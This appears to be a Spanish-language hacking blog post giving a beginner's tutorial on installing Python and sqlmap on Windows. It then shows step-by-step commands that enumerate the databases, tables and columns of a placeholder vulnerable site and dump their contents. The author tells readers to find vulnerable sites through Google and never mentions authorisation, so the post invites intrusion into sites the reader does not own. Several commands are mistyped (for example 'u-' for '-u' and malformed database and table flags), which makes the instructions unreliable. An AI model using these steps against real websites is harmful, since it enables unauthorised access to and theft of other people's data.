Hackvirus
hackvirus
|
|
|
|
Si buscas
hosting web,
dominios web,
correos empresariales o
crear páginas web gratis,
ingresa a
PaginaMX
Empecemos con la herramienta SQLMAP WINDOWS (LEER)
- Para auditorías a bases de datos bien este tuto es muy sencillo no profundizare - Es una herramienta que viene en blacktrak, blackbuntu kai y demás.. distros para testing - solo se baja y por comandos se instala solo en esta ocasión me enfocare a Windows - La página oficial es www.sqlmap.org - Descargar ATENCION ENTRAN AL C: Accesos rapidos: Win+e entran a el disco duro Crean una carpeta en el C: con el nombre de sqlmap - Descomprimen el zip en la ubicación de la carpeta (ADENTRO DE LA CARPETA) - C:sqlmap Pasemos a la siguiente parte: Sqlmap está escrito en python por lo tanto necesitamos el intérprete para ejecutar tales paquetes :D Descargamos el archivo desde la página oficial www.python.org http://www.python.org/download/ Python 2.7.3 Windows Installer (Windows binary -- does not include source) Python 3.3.0 Windows x86 MSI Installer (Windows binary -- does not include source) Descargamos el que se vase a nuestras necesidades si el S.O. es de 32 =86 o 64 bits Lo intalamos siguiente siguiente siguiente=è finalizar Como recomendación REINICIAR EL WINDOWS (ya que es una mierda en esa parte)(no es necesario pero para evitar problemas) Ya reinada la maquina ES NECESARIO EJECUTAR EL CDM COMO administrador En ella escribimos cmd o CMD (símbolos del sistema) Ya en ella los comandos cd.. cd.. cd.. hasta que nos muestre esta ubicacion C:/ En esta dirección escribimos cd sqlmap (para abrir la carpeta del sqlmap que descargamos y descomprimimos anterior mente) Bien eso es todo ahora a trabajar buscan una página vulnerable (NO ENTRARE A ESO OK ESTA GOOGLE) NO TODAS MAS WEBS SON VULNERABLES OK www.urlvulnerable.com/index.php?id=23 EN EL CMD ESCRIVIMOS 1.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 (un espacio)—dbs Si es vulnerable nos mostrara las bases de datos 2.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) --tables 3.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) (un espacio)--tables 4.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) (un espacio)-(nombre de la tabla) -- dump O bien seria-- columns ya encotradas las columnas desgargar las columnas con --dump Bien eso es todo Algo básico y si no para mayor inforacion busquen en youtube hai muy buenos videos de sqlmap Es lo mismo que en blacktrack o blackbuntu o blackbox etc…. Kali Fin |
Vínculos |